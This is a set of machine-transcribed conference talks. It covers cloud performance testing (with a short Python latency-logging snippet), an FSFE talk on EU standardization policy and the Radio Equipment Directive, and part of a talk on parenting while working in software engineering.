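    start = time.perf_counter()
    cur.execute(QUERY)
    cur.fetchall()
    latencies_ms.append((time.perf_counter() - start) * 1000)

p95 = sorted(latencies_ms)[int(len(latencies_ms) * 0.95)]
with open("db_baseline.csv", "a", newline="") as out:
    csv.writer(out).writerow([datetime.datetime.now().isoformat(),
                              round(statistics.median(latencies_ms), 2),
                              round(p95, 2)])
```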
So that, that would be the, the ground from where you build up to, to get a better understanding on how your managed database behaves. I'm not sure if that's answered. Okay. I have a somewhat specific question. What is the general advice for handling with handling spikes, like we are already including a solution which is a particular entity responsible in those things, but is, I'm, what I'm thinking is about, is it good to augment auto scaling with some sort of reserve capacity for these situations or how do you deal with spikes? You got to predict that. Yeah. Yeah. Sometimes, sometimes you can, or the question is how do you actually deal with traffic spikes in the, in a, in a cloud environment. And if you, if you are, if you should go for auto scaling versus, or maybe even combined with over provisioning so that you have enough capacity. And, and the other comment was that most of, most of the time you, you can't really, really predict a traffic spike. This is, this is true. Sometimes it is true. Especially when, when we are asked to test things because, yeah, customers plan big marketing campaign or coordinated cross media campaign, campaign, then you can sort of guess what, what the traffic spike will look like if it really happens. But otherwise, yeah, you can't really fully prepare for that because it's a big, it's a big unknown. If you, if you are expecting such a traffic spike, then most of the cases solely relying on auto scaling won't really work in my experience because it's first, it's really hard to get all those scaling policies right and to optimize your server images in a way that they actually boot up really fast and are ready and service fast enough. So, and you really, at least for AWS, this is the case. You, you, you see that all those services at AWS are more designed to run on a, on a bigger scale. You have not only one instance per availability zone, but multiple ones. And you, you have to have some degree of free capacity of headroom in order to absorb the, the, the incoming wave and to give you more time to spin up more, more instances. And if you are expecting such a spike, then, yeah, you can basically prepare for it and just ramp up your desired capacity a little bit so that you, you, you can absorb the traffic better. And otherwise, yeah, I'm not really there, there, there is no general solution, no perfect general solution to that particular problem, actually. So, I thought that your ideas about them, chicken, so if I know my system can stay on like, yeah, and then the next question, the next question is for quality machine. Measurement. It's, it's, this is a, okay. Yeah, okay, you, you are, let me check if I can summarize the question. You are having trouble with the argument that you, that you can do run or that you should run performance test against the cloud if you have an environment that, that is, that is changing. And not only because you are changing it because the, the provider itself is, or other customers that are using these infrastructure are having an influence on your system as well, right. So the noisy neighbor problem, for example, and stuff like that. Okay. This is, this is quite, quite interesting. I get this question actually a lot. And from, there are some ground rules. I'm, I'm, I'm particularly familiar, familiar with AWS. 
I'm not so sure about all the other cloud environments out there, but for AWS I can say that you should avoid some very basic, stupid ideas, like using these micro instances for your production traffic. They can have, what was it called, CPU credits or so: for a short amount of time they can do a lot better in terms of CPU performance, and then for the rest of the hour you are throttled to a lower level. That is in general a really bad idea. But most of the time the noisy neighbor problem is actually not such a big thing if you are using instance sizes that are typical for a production environment. For example, when it comes to network performance, we utilize the AWS network quite a lot, because we run tests from a couple of megabits per second up to the double-digit gigabits per second range, and we rarely see any big fluctuation in the network performance or packet performance. So if you are using HVM virtualization, for example, and use the correct settings on your servers, we rarely see a big change in the general performance. If you are running a mission-critical stock exchange application, then maybe you don't want to run it in the cloud in the first place, but for most of the applications out there the performance is quite predictable in this cloud environment, at least for the mature providers. That is at least our observation and the observation of our customers. So that would make it quite comparable, at least within a specific margin of error. Yes, any other experience when it comes to that? Okay. You looked a bit skeptical. One more thing I'd like to add: normally the biggest performance issues are problems that are configuration-based, and just development stuff, engineering stuff, bugs that were introduced into the system. Normally you have to work through a lot of that before you actually reach the area where you need to look at the underlying network performance. So the question is about the order in which to perform those methods. The order is not strict; normally we just do a quick load test to start with, just to see roughly whether you reach the area that you were actually aiming for. Then it highly depends: if the result is good, we directly run a scalability test, or a series of stress tests, to determine the capacity and to see whether your system scales beyond your limit. That is most of the time the customer's request when they are running in the cloud. And configuration testing is often used as a troubleshooting or debugging tool, or to quickly verify a change you are making in order to optimize the performance: you saw in the load test that you have a big problem here, you have an idea, you prototype it and apply it, and then you basically do a configuration test with that one version, maybe with the feature branch that you are testing. And if you are using a tool like the one we built, then you just hit the play button, run the test again and compare these things to one another.
But yeah, and even though I said that configuration testing is the most important and interesting thing, it's most of the time it isn't really that what we do first, because first you have to see when, yeah, if you are hitting your goal, at least roughly. What are some of the tools you probably use to build your own? Yeah, most obviously I use my own, own tool most of the time. And I'm pretty, pretty familiar with, with Tsung, which is an Erlang based performance testing tool. I, yeah, I have to look into Jmeter from time to time because customers are using it. Jmeter, yeah, and yeah, there are lots of other, other tools out there. But in the end, it doesn't really, I have to be careful because the sales guys are hating me for that. It doesn't really matter what tool you are using, at least not at first, because it's much harder to, to get an idea on what you want to learn, what you want to test, how you want to test, and so on. And that's how you want to test, how do you organize those tests, who, who is responsible for testing, who should be present when you are doing a larger test. Those are all things that are much harder to, yeah, to, to start with compared to, yeah, picking the ideal tool for your solution or, yeah, automating it to the, to the last, last extent. I would say them, it is more, more important to get started quickly and to have the first, yeah, to first, the first results quickly so that you can iterate on, on that. And if you need to switch the tool or, if you are happy with the tool, it's, yeah, it's something that, at least from my experience, comes a little bit later. Okay. What's wrong with your question? Or was it answered? Okay. Okay. Yeah. Okay. Thank you very much. Thanks.
|
The Cloud™ is infinite and scalable. Period. Why, then, is it still important to test the performance and scalability of cloud-based systems? Doesn't my provider scale my system for me, as long as I can afford it? Yes, but… Cloud providers primarily scale resources. They do not automatically ensure that applications are fast, stable and, much more importantly, scalable. Performance tests are an important instrument for understanding a system and its runtime environment.
|
10.5446/32463 (DOI)
|
Okay, welcome everyone to the afternoon track here at FrOSCon. In this room we have Polina Malaya from the Free Software Foundation Europe. She'll tell us a bit about EU policies and what influence they have on open source projects. So, welcome. Thank you. So, do you hear me? Yes, I hope it works. Okay. So, hi everyone. My name is Polina, as I've already been introduced, and I'm a human rights and intellectual property rights lawyer, a digital rights activist, and I work for the Free Software Foundation Europe as a policy analyst and legal coordinator. Today I will give you a talk about EU policies, actually the most recent ones that are important for Free Software, and how FSFE is active in this topic. There have been several attempts to include Free Software in discussions on the European level, and FSFE has followed them from the start through policy advocacy work, which means publishing analyses, meeting with officials, campaigning for change. But let's start from the beginning. Oh, not working. Does it work? Sorry. So, throughout the years, Free Software in the EU was mostly a part of internal IT strategies and policies, meant only for the IT departments within the institutions and not much of an overall, general policy field. One example is the European Interoperability Framework, which was an official document from the beginning, aimed at public administrations to increase interoperability within public administrations. The other example is the open source strategy of the European Commission. This was mostly a response to the excessive vendor lock-in within the EU institutions, which is still evident from software purchase agreements in public procurement. That means that EU institutions directly require acquiring products from particular vendors; Microsoft, for example, is one of the most dominant vendors. That also resulted in the case before the European Court of Justice where Microsoft was actually fined for its anti-competitive behavior on the desktop operating system market. FSFE was involved as an intervener in this case to represent the interests of Free Software developers, and we argued that there is an excessive vendor lock-in in the EU institutions. So despite all these efforts, by 2016 the vendor lock-in still stands firmly, according to the most recent study on lock-in in ICT procurement. According to that study, 52% of respondents amongst public administrations have experienced vendor lock-in, and even though awareness of that problem is high within public administrations, they still feel almost powerless to question any alternative software. The top-occurring vendors and products that institutions are required to acquire are then Microsoft, Oracle, SAP or Windows. But meanwhile, the world outside of the EU is changing and Free Software is everywhere; you basically can't overlook it because of nearly universal software development practices. So the EU has to somehow address that topic. So what is the key to success, the EU asks itself, and a reaction on the EU level has to follow. One of the most interesting and most recent documents is the Digital Single Market Strategy, which was adopted last year. It's an umbrella initiative with different legislative and political reforms on the EU level about how Europe can become an ICT leader on a global level.
And so the EU tries to identify these key areas. From the Free Software perspective, the most important ones are the standardization policies. The EU identifies the priority areas in standardization as the cloud, the Internet of Things, Big Data, cybersecurity and 5G; these are the priorities for the EU until the end of 2019. And how to implement those policies? The EU also identifies a couple of instruments: the Joint Initiative on European Standardisation, the Rolling Plan for ICT Standardisation, the annual Union work programme, and the European Interoperability Framework. One of the most interesting documents within this is another communication, from April this year, and it actually made some noise in the community, in civil society and a bit in the media because of its contradictory nature. It includes some really positive aspects for Free Software. Here we have to acknowledge that before, the EU was only focusing on Free Software as part of an internal strategy that was not supposed to go outside of the IT department, but now we are talking about a more general policy objective that might even somehow be reflected in the law; but yeah, who knows. So the standardization priorities say that proprietary solutions can hamper the potential of the digital market, that we need common open standards, and that we need to make more use of Free Software. The same goes for the Internet of Things, where we need an open platform approach and should promote open standards, and the same for data. Those are all good, positive steps. But of course it's not always as good as it seems from the beginning; so, there is no cloud, but the Commission says there is. And there is one fly in the ointment: despite all the good stuff the Commission says before, it bases its standardization policy on FRAND licensing, and that is unacceptable for Free Software. So why is FRAND bad for Free Software? FRAND stands for so-called fair, reasonable and non-discriminatory terms to license patents that are essential for implementing a standard. A standard is a common norm agreed within the industry, and it is contained in a specification which is protected by copyright, but it can also include references to patented technology, and in order for a project, an implementer or a company to implement that standard, it needs to acquire the patent licence. This is how the industry, mostly the telecommunications industry, has resorted to these practices, saying: you as a patent holder have the right to restrict the implementation of your standard, but you have to license it so it is accessible for everyone on these fair, reasonable and non-discriminatory terms. The problem is that these FRAND licences are negotiated in secret, so it is very difficult to know what is fair amongst the industry, what is reasonable and what is non-discriminatory. And for that reason, FRAND licensing practices are very often used as an anti-competitive tool to abuse the monopoly that the patent right holder has. That's why it is not favorable in general, but it is especially not acceptable for Free Software, because it goes against the licensing terms under which Free Software is distributed.
So the problem is that it is mostly an exclusive licence, which means that it is only negotiated once with a particular implementer, and another implementer who wants to implement the same technology has to go again to the same patent holder and negotiate again. It also usually includes a requirement to pay royalties per copy, which is difficult to calculate for Free Software, because the Free Software licence is non-exclusive and the distribution is not limited. So in conclusion, this is why it's not suitable for Free Software. What can the solution be? Since the Commission, and also the industry, don't really know what FRAND means, because it depends on the negotiations, there is the possibility to define FRAND on the EU level in a way that is acceptable for Free Software and simply removes all these restrictions. The problem is that then it's not FRAND anymore; it's restriction-free licensing, which is already in use for software, web and internet standards, and there is a reason why the internet is basically functioning. So that's about FRAND. And as we already briefly said, the European Interoperability Framework is one of the instruments to implement the standardization policies, so let's take a look into that. It was first adopted as an official guideline for public administrations within the EU, and it was a really interesting document, because despite its unofficial status it actually set an example for numerous national policies and included a very progressive approach to open standards at that time. It actually required that, in order to ensure interoperability, open standards need to be promoted, and the licensing policies were quite good in the sense of open standards and Free Software. Then, in 2010, the European Commission thought it was a nice document that could be lifted from its unofficial status to a more official one, and that involved massive lobbying, and so the document was completely changed. In the end, open standards were not called open standards anymore; they were called "open specifications", which is a misleading term, because it only reflects the specification part, which we already touched upon, it doesn't address the other issues, and it also just waters down the existing, commonly known term. And it also introduced, for the first time, the FRAND terms that we just touched upon. FSFE identified evident copy-paste in the leaked drafts from the European Commission from the lobbying groups' positions that were handed in; that's just a screenshot of it. You could see that the pink parts were exact copy-paste from the comments submitted by the Business Software Alliance, so the Commission just took one side instead of being impartial. Yes. So in 2016 the European Interoperability Framework is again on the agenda; it is actually going through a third revision, and the problematic parts are still there. It takes basically the same approach as the previous version: there is no reference to open standards, and from the wording it seems that the document is being lifted even further, with even stronger language, because it already talks about how Member States should implement it, which is a bit too strong a language for such a document. And yes, I'm sorry. Okay, just ask quickly. Okay. Yeah, it's good. I would like to have them at the end, but go ahead. Yeah.
You said this approach was more unofficial, and then with the second one, in 2010, it got a more official character. What does that mean legally? Yes, okay, I understand the question, thank you. So in 2010 it went from being a more internal document to an actual initiative, which means it is an official document from the EU. And even though it has no legal force, because it is not law, these are policies that are basically used to shape the existing laws in the Member States. If a Member State doesn't implement it, nothing will happen; if a law is not implemented, the European Commission can sue the state before the European Court of Justice, but in this case nothing happens, they can just issue some recommendation. There is a sort of supremacy of these policies, but in the end the Member States are free to do whatever they want. The problem is that you can see that it gradually becomes more and more binding, and that's why we should care about it, because we don't want this to end up in the law if it goes wrong; that's basically the question. The problem with what's happening now is that I've only seen one draft version, and it's just speculation so far. That's why we need to act while it's still a draft, rather than deal with the consequences later. So yes, in 2010 it became an official document; before that it was unofficial, just internal. Then it became an official document, which is already an initiative, and they also issue studies and score the Member States on how much of it they have implemented: okay, how much of this have you implemented in your state? Yes, they can't legally do anything, but it depends on the Member State: some studies show that they are lagging behind, and I guess Member States see, okay, we're lagging behind, maybe we should do something. So it kind of depends, but from a 2016 perspective it is still better to shape it in the right way now, because if it actually becomes law, adopted as a directive for example, then it will be difficult to do something about it once it has to be implemented. So I hope I answered your question. Okay, so on that note: the language is stronger. One good thing about the current draft is that royalty-free licensing is the preferred notion, which is a good thing, because it at least eliminates the royalty criterion from FRAND, but it doesn't address the other restrictions that such licensing terms can pose on Free Software distribution. So that's it on the Interoperability Framework. With the Digital Single Market, the umbrella initiative that the European Interoperability Framework is part of, I think it is easier to understand why it affects software, because it deals with such questions as the ICT standardization of technologies. But now we come to an actual law that is already adopted and enacted, and that can have more impact on Free Software than the previous instruments we were talking about, because those are just impulses. Now we are talking about the Radio Equipment Directive. And how we got to know about it was actually a little accident, because we were following the discussions in the US, which were talking about introducing a dangerous software compliance regime. And we thought, okay, we're going to look into our own laws.
And apparently it turned out that because we didn't follow those policies and like non-binding documents, we actually missed that part when something dangerous was introduced into the law. And that is then the radio equipment directive, which we call radio lockdown directive. And so a bit of background about that. So it's a directive which means that it's a law and member states have to implement that. So if that's not in the national law, a commission can sue a state. So it was adopted in May 2014. And it affects all devices that consent and receive radio signals. So through Wi-Fi, mobile network, GPS. And its main purpose was to harmonize the existing rules. So there was already an other directive before that. But it wasn't implemented in the member states. And member states were just creating their own rules. And so for the harmonization purposes, this new directive was introduced. And so member states had two years to implement it. And so yeah, so it was actually this year, not too far, far time ago. But the problem is that it actually introduced dangerous requirement to ensure for safety and security reasons. And it's basically put an obligation on device manufacturers to ensure that the combination of hardware and software. Like you know, yeah, so I mean, how should, yeah. So basically saying that, OK, for security reasons, you can only put this, but you have to show that that software that can be put on that hardware is safe. And that means that it just puts a very disproportionate obligation on device manufacturers to test every possible hardware, software combination and say that, OK, this is secure and this is safe. And that basically creates a very dangerous situation where in fear of being liable for some safety critical bug or something, then they would just make sure that no alternative software can be put on the particular hardware. So that's in the end means that you can use alternative software on such devices as routers, Wi-Fi cards, and basically all Internet of Things devices. And that was then all justified for the security reasons. And but it turns out that installing alternative software actually helps increasing the device's security. And it also puts a very strict obligation that is unnecessary for such products as a router or a laptop, which has a limited radio output power. So it's a very vague obligation. And I mean, it's also, again, as law has been very general, but it's basically still creates that backdoor in the law. And but there is something that we can still do despite it being already unofficial law that has to be implemented. And so the problem with this obligation is that it is new one, and it hasn't been introduced. Yes, it hasn't been introduced before, according to the previous directive. And so how to implement that particular obligation in the member state is for first member states to decide because it's a directive. But also the European Commission has to come up with like an additional delegated act to say, OK, these devices, you should check for that compliance. Others not. And so these acts have not been adopted. And so if these acts could be somehow be influenced, then there is a reason to abstain from this dangerous impact. And so what we are arguing for is that in the member state, on the member state level, first that the delegated act should be done right, and that on the member state level, there should be an exception for free software. They say that it's OK to put free software. 
Or for a widespread and critical consumer devices, saying that, OK, these particular not critical infrastructure devices should not be impacted with this because it severely hampers consumers' choice and competition on the EU level. And so what FSFE has done is that we published, we were one of the first to draw attention to that and we published the joint statement. No, before we just published the information page. And many companies and other organizations came to us saying that, OK, I mean, it's something that we should also look into and can be somehow supported. And then we came up with the joint statement. So it's still open to signatories. And if you feel like this is something that should have an impact and should change on EU level and you want to have more voice into it, put more voice into it, then you can still sign it. And this is just one of the few companies and organizations who decided to support us there. So and yes, so and many other, you can check the first link and see all the other organizations. And so, yeah, I'm pretty quick today. And so if you want to support us in these areas and topics and on our goals and to make sure that we don't miss anything important for free software on the EU level, then you should subscribe to, first maybe subscribe to our newsletter because then you'll be updated on what's going on. And we also have always an action item there. So they weren't can act upon or write to their member of the Parliament or something like that. And or you can also order a promotional material and spread the word about us. And if you just don't have time for that, then you could always just support us with money and donate. Yes. So you can always drop me an email if there's something, some topic you would like to draw my attention and or just we always support of like we always in need of like technical expertise or anything like that. And thanks a lot. And yeah, I opened the floor for the questions and questions and answers. Thank you. I've won myself anyway. Okay. You, regarding the regulations, you were stating about wireless devices, for example. You said that you're pursuing local governments to put in that exception for open source devices. But given that the Americans have somewhat similar legislation and device manufacturers will mostly work on a global basis, I think, do you think that they'll still make exceptions in at the device level to to run open hardware open firmware on there? Because if they have to limit it for the US and not for three countries in the EU or all but three countries in the EU, would they make a separate version for that? Do you think? Well, there's yes, there's also actually there's been a case already in US. I think it's in the beginning of August about that. It was yes, so it's about like TP link and there was exactly for the same requirement of software, software and hardware compliance. And so the so the court was saying that the alternative software should not be hampered by that, but they still find TP link to be liable, which is a little bit like, okay. So yeah, it's actually it's a good question. But I mean, the problem is that laws are different everywhere. And even despite the manufacturers acting globally, they're still acting in every different country according to the country laws. So okay, this might not be that in US, but it might be still might be in Europe. So laws are not universal. So I mean, and manufacturers have to abide by the national laws. 
So I would say that there is I mean, at least at some point there, there is hope to make it better. Also to you should care about that. Yes. Thank you. Thank you very much for your talk. Thanks. It's very concerning a little bit. What's happening there on you level. What I'm a little bit concerned about like stuff like routers or something like that are basically complete computers and machines. So they are basically the same as a desktop computer. And we have also radio interfaces, laptop notebook, whatever. So could those radio regulations also have an impact if all cases fail on laptops, for example? Yes. Free software on laptops also. So we're not just talking about network equipment here. Yeah. Yes, exactly. So this is also what our concerns because of it because of the wording of the directive is so vague that all the cases can fall in under that. And this is what makes it so concerning because before that we didn't have that requirement. And now suddenly we have that. And that's why it's really difficult to say whether it was that because you was unaware of what this can bring or it was something that some lobbying went too far at some point. Yes. So laptops, yes. Smartphones, yes. So we have to fall into that. Crazy. Crazy. Thank you. I'm not sure how much this really affects smartphones because the parts are really interacting with the radio stuff. At the moment they aren't free. When you are using Android or something similar, you have binary blobs for the Wi-Fi interface and other radio interfaces and you have a separate process or doing the cell phone stuff. So I don't think it affects smartphones so much. It's already bad. So I don't think that we will get worse because of this regulation. And then notebooks at least, there are Wi-Fi chipsets which are hard to make. So the Wi-Fi stuff is done in hardware more or less. So there's some kind of interface which is really fine. And I think laptops are more or less concerned by that. But routers are really a, and the Internet of Things are really a tough thing. And about the regulation. At the moment I think smartphones are usually registered in Great Britain. So they acknowledge the organization like FCC like in Britain. They register and say it's okay according to the regulation. So I don't know how the Brexit will change that probably. So perhaps there will be some other country where most of the equipment will be checked because it is fulfilled through regulation. So it might be useful to find out which countries that is and put effort to influence the regulations there. That's a good point. That's a really good point. I agree. I'm interested in the case of overseeing the development of the law. Is the Free Software Foundation the only organization that could prevent it when not overseeing it? Or are other non-governmental organizations around that also overlap that? Yes. Actually with R&D we were the first ones to publish anything on that. So as much as I talk to other civil societies they're like yeah we missed it. So it's really because of its highly technical nature and the fact that it's not a trendy topic of privacy and mass surveillance or something like that which is usually most of the digital rights organizations are focused on. And also other free software organizations or open source free software organizations they're also overlooked it and that's really unfortunate. It's like no one could even see that before a more, because in US there was more media attention to that and everything like this. 
And in our case in Europe it was just passed like that. So yeah, we were the first ones. And it's already quite late. Exactly, exactly. That's the lesson we learned from this; I'm trying to save it at the last minute somehow. Okay, I think that's it. Thank you again. Thanks. The next talk will be at 4:30, not in this room, because the next talk here is cancelled, so we skip a slot. Have a good day, everyone. Thanks. And just one last remark before we go: my colleague Max Mehl will give a talk about the Radio Equipment Directive and the Compulsory Routers campaign in Germany, and if you're interested in more details about that, then go and see him at 16:30 in the first room. Thanks.
|
In the coming years, the EU is determined to bring its industries to the digital market and acquire a leading position on the global tech market. In order to achieve this ambitious goal of allowing Europe's "own Google or Facebook" to emerge, the EU has come up with several political and legislative proposals that obviously cannot overlook software. Three or more magic letters combined in an acronym have, therefore, the power to either support innovation and fair competition, or drown the EU in its vendor lock-in completely. The terms "open standards", "open platforms", and Free Software are being used more and more often but does it mean that the EU is "opening" up for software freedom for real? My talk will explain how several current EU digital policies interact with Free Software, and each other, and what does it mean to software freedom in Europe.
|
10.5446/32464 (DOI)
|
Welcome, everybody, to the after-lunch presentation and session. Next we are going to have an inter-process communication talk: we'll learn about the fork() system call, as I read from the description. Just joking, we'll hear something about the parenting process, and I'm very glad we have Pérez here as a speaker, so please give him a warm round of applause. So if you were expecting some kind of multi-threading talk, you are in the wrong place. This is me, and I'm going to talk about parenting processes, because most of us have forked these days. I'm Pérez, a software engineer since forever. I've been working on databases, analytics, platforms and data science since the very beginning of my career. I used to run the graph devroom at FOSDEM. Most of you know FOSDEM; it's kind of the big brother of this conference. If you don't know about it, you should go to Belgium, first weekend of February. It's amazing; it's the best conference ever, with all respect to FrOSCon, which is also very good. Obviously I'm not just coding all the time: I like to enjoy my life with my kids and my wife, TV, movies, series, and I used to do a lot of running before, when I had more time. That's basically me. Before I start, I always do this kind of thing: I come from Spain, from Barcelona, and I've been told by many of my German friends that I'm the fastest speaker they've ever met. As Leslie once said to me, if I speak too fast, just let me know with something like "slow down, slow down", and I will slow down. The second disclaimer is that we are going to enter a very sensitive topic. Everything that involves kids brings extremely strong opinions; for me, it's like religion or sports, you know, everyone has an opinion and is extremely vocal about it. This talk includes my personal experiences, opinions, ideas, and some numbers that might not match 100% of the reality. So welcome to the bias. We're going to be talking basically about what software engineering is today and what we are doing at work every day. I'm going to provide a few numbers about what parenting and having children actually means; some of them come out of a poll that I made a few weeks ago, so they are contributions mostly from the community. I'm also sharing one of the things that really worries me the most, which is society's expectations: things that we do because others expect us to do them. We're going to talk about what startups and company culture mean and do for us, and a few tips about what we can and should do to avoid it. So, starting with what software engineering, or software in general, means for us today: basically we find software everywhere. We find software in our refrigerator, in our computers, on the internet, etc. So a lot of what we do has a strong impact on what other people are actually feeling and doing every day. And for all of us, software is a passion. I've been playing with computers since I was a small child, dealing with a CPC 128, with a cassette and all these things, while my brothers were playing football on the street. Most of you might think that this is probably sad, but for me it was super fun. So it's a passion, and what we do as a job is our hobby. One thing that we also find in our industry is change: things change extremely fast and change every day, so we are kind of required to be constantly learning and improving ourselves every day. So what we just learned at the university doesn't mean anything ten years later because, you know, when I was at the university, a child was starting.
Now a child is here and we even have several flavors of it. Yeah, so we really need to keep learning all the time. There is also one idea that I strongly hate: it looks like we have to be programming at work and programming after work, because we should have a portfolio somehow, because when we face a job advert they ask us: what do you do, do you have a Git profile? And I find this extremely complicated, because for me as a human being I don't just enjoy programming eight hours a day: I used to go running, I like to spend time with my kids, I like to play games, etc. So this sometimes makes me the less appealing candidate for some jobs, because I don't have an awesome portfolio. But this is how it works: more or less you have to live your programming life at work, after work, and so on. Another important thing that happens in our jobs as software engineers is the distinction in what we call ourselves: we call ourselves developers, we call ourselves engineers. Do we think our job is a craft or an engineering job? Because this leads to really different company cultures. I like to see it as the difference between alchemy and science. More stuff around what we do every day: our job is highly rewarding, especially when we fix issues, or at least it is to me. When we fix something and make something work, it's awesome; at least this feeling is something that I like a lot. Maybe this is going to touch some feelings around here, but our company culture tends to be driven by ego. We are told that we are ninjas, hackers, whatever, that we are the best, that we are brilliant. We are good people, but ego is so important in our culture, kind of making everyone feel special. This is how our jobs usually are. Also, our companies are always male-centric; we have an extremely low number of women, which is extremely sad, because without diversity we don't have these different opinions. More facts: we love to be focused, and if we are distracted, this is very bad. Related to this is what I like to call the hero culture. I guess all of you pulled all-nighters to finish work during university times: you have to meet a deadline and probably stay at work a long time when it wasn't necessary. When I look at myself at university, when I was studying, I never did these all-night shifts or this kind of heroics. It's pointless: if you plan your work properly, you can avoid it. But this is how we work; we work as if we have to be there long hours. I don't know about the rest of Germany, but I find it crazy in Berlin that this happens a lot. We have a lot of irregular working hours. I saw a lot of my colleagues, not now, but when I first moved to Germany, starting work at 10 or 11 and staying until 8. It depends on the company, but especially in the startups, at least in Berlin, we have irregular working hours. And the last kind of fact about what we do in our jobs, our working hours and so on, is that we are not able to generate enough interest in engineering. I don't really know the numbers in Germany, and especially at FrOSCon it's not the right place to say that, because we have a lot of kids running around here, and it's amazing. But, for example, the number of people willing to go to university in Barcelona and engage in computer science is going down. And this is a fact that affects all of us, and we have to think about it. Yeah.
So these were kind of descriptions, kind of very fast descriptions of what we do at work and how we work. Before we move forward, I would like to think about one thing about what we do and why we do it. We define ourselves by what we do. If we ask our colleagues or we met a person for the first time, we kind of define each other, you know? You are a software engineer, you are a system administrator, both hate each other, I don't know why. Then we create DevOps or you are a fashion designer, you know? You are on IT, you are not technical, you are technical, etc. This is very important. And when we exclude or work on other things, yeah, we kind of lost this definition of ourselves. So after this kind of fast explanation of what we do at work and that work, it really defines ourselves. Kind of short stuff about companies. Our industry and companies are extremely diverse. But usually in all the companies, the culture is defined by the founders. I am very lucky to work at a company that the founders decided to build distributed from the very beginning. And this makes it, for example, I have colleagues working in Japan, I have colleagues working in the USA, and both work in the same team. But some other companies, because of fear, because of lack of trust, whatever, they want you to be in the same office. And even if it doesn't make sense for your work, they want you to stay there. There is a nice article from the BBS about the lack of trust on working remotely. And this really involves your daily life. It is important that if you are in a company and you do that way, it is important to set the right culture. Another thing that happened to me, or that I saw a lot of times in Berlin, or in Barcelona, even also, is when you build a startup and you have no money, you want to work a lot of hours, etc, etc. And this makes sense. So taking the right amount of people to do that, it is kind of stuff. It is important to know, many of you, for example, might know, but working more than giving a month of hours in Germany is illegal. So it is important to know your rights here. Something that also drives me crazy about startups is they are mission-driven. Every startup has a mission. And my question is, are we going to save the world with that mission? So every company has a job that is good money from customers and serves their customers. But all of this kind of helps this hype culture of ego when we want to get a company. And last on the list, we might have different understanding of what productivity means in a company. We actually have, because I'm lucky that I've worked on places that you basically got a task assigned and you were measured for your task and your job done. But I've been in other places that long working hours and you have to be there. And it's still important to know what kind of things you are in. Let's talk about perks, or what do we get at a company? I see some of you here that probably got the child at the university already. And some of you that may right after university. A lot of companies give in Berlin, Clomate, Pia, Akeeker, Ping Pong Table. I've seen very few companies being innovative on this idea, on how to attract people. But it's always provided or subsidized more or less. And at Lez in Berlin, in other areas like Vienna, where I used to do some work a few years ago, it's less common, but host meetups usually run after hours. So this means that you have to stay even longer. And few large companies might have a take care, but very few. 
Talking about the culture, as I said before, not everyone is used to remote working or working from home. Not quite sure about the rest of Germany for sure, but I know Barcelona and it's not like this. And looking for remote work actually is something that really lets you define your own piece and your own work. And as I said before, this article from the BBC, there is no such thing as flexible work. It's really, really interesting to read because it really tells you that we don't do more remote work because we are lacking trust. So it's really important when you create a company that is important facts. The environment in companies, as I said before, hiring. We used to use this Ninja hacker. I mean, maybe this is attracting some people, but I know this is changing because, for example, at my company, I work for these days, this is kind of improving. But in general, I still see a lot of ads that try to attract people with this ego driving idea. And last but not least, we might not be hiring the right people at certain ages. Because for some people, we ask weird questions. Weird? I mean, we don't hire women at a given age because they might get pregnant. We don't hire men after 45 years because they might forget all the history behind them, but they get the experience. So sometimes I see this in companies and it's very sad. Especially coming out of me, what I like to do, other things, not just living for my job, work-life balance is very important. So I ask myself a lot of times what companies can be do on that area. And most of them kind of ask me the same questions. How much work, how much balance? What does it mean for everyone? And I'm sure that if I ask someone here what work-life balance means, it means completely different for each one of us. For some of us, it might be that my company let me work on open source. For some of others, it might be that I want to do a sports. I'm setting up myself for the next triathlon. Or I want to run Berlin marathon. So I don't know about every company as I said at the beginning, but work-life balance in startups in Berlin or corporate companies in Barcelona sucks. Usually means that, for example, the typical average time that an engineer is working in Barcelona is from 9 to 7 with two hours break. From 9 to 7, it means that if you have one hour commute, you go back at home at 9 p.m. If you have childs, for example, this is no way something that scales. So just kind of a quick gossip thing. Most of my friends, when they go to childs, they start working freelance for international companies in Barcelona. And that's why, because the work-life balance is not so good. So after software companies, a little bit about what actually having childs means, and we do like regular basis. By the way, I have one and I wait another one for December. So I'm busy and I'm going to be extremely busy in December. As some of you who have childs or not, having a child is, it changes everything. There are no rules applied. And it's extremely different from one child to another one. I know the history that some parents tell me that they don't sleep for a long time. I'm very lucky because after two months, my kid was sleeping eight hours. But sleep is a very challenging thing. So if you have a not list, everyone likes the way they do it and they're extremely vocal about it. They tell you, you have to do these things that way, that other way, and you have your own ideas. And for sure, it's an ongoing process that you are changing every day and you don't know anything. 
So yeah, it's no time to complain for further. After a while, they grow up, you feed them, and they go to kindergarten. By the way, you have to find one before. I don't know the rest of Germany, but in Berlin, it's extremely challenging. And in Barcelona, it's extremely more challenging. So yeah, it's a big deal after that. And they get sick. So they get sick, you get sick, you have to maybe not go to work, and you have to get them to the doctors. So this means that you have to do a lot of things. And you actually have to devote yourself to be proficient in your work. You have to devote yourself to be good at home, etc. Something that really amazed me from Germany is this picture. I see so many dads in Berlin playing with their kids in the playground, in the cafes, etc. This is not imaginable in Barcelona, for example. It would be crazy that you do that. And that's amazing, because this means that you are more involved in your kids' education, you are more involved in what they do. This is less common in all places than in Germany. It's one thing that everyone has to think about themselves. What do we do? Do we involve more, less, etc. And as I said before, time management, when you get kids, it's kind of crazy. So you have less time, you have to be at work, and if you happen to have these timetables like we have in Barcelona from 9 to 7, it's like I'm a missing parent. One thing that a very good friend of mine told me in Berlin is what they do is they basically introduce the month of hours they work together and they share all the stuff that happens. So, yeah, it's a very important thing. And usually it's so happening that still women are taking all the care and all the load, that what means having a child. But yeah, important thing is time. I usually improve myself a lot about my time management skills after I got a kid because I have to. And in a natural, more or less, someone that's sitting down there kind of highlighted, we discussed once that you are as bad-patterned as everyone else is. And this is very important to understand from the very beginning. And empathy should never be forgotten when you are in all this because empathy for work, because they need you and your teams, and empathy in your work for you that you get a sick kid, etc. Yeah. And after kind of a few things about what parenting is, I'm going to enter the most scary thing in areas of this world, society expectations are. I guess this happens here in Germany like it happens in Barcelona. People expect you to do things one way. For example, we bought for our kid, we went to this IFASHER show in Berlin, and we bought this ear protection stuff. Now we are going on vacations to Barcelona, and we will get this protection stuff because we're going to see fireworks, and some kind of crazy dancing under the fireworks that we do in Barcelona in summer. I'm totally sure that my family will tell me and my friends will tell me, what the fuck are you doing? You're crazy? You don't do that. Here in Germany is the other way around. All people in the IFASHER, even the speaker in the IFASHER show in Berlin, were telling everyone, don't take your kid's ears because this is very loud. Usually we don't do a lot of things. Sorry. We have just a few, so it's easy to interact. It might be. But I find it very nice. What I was 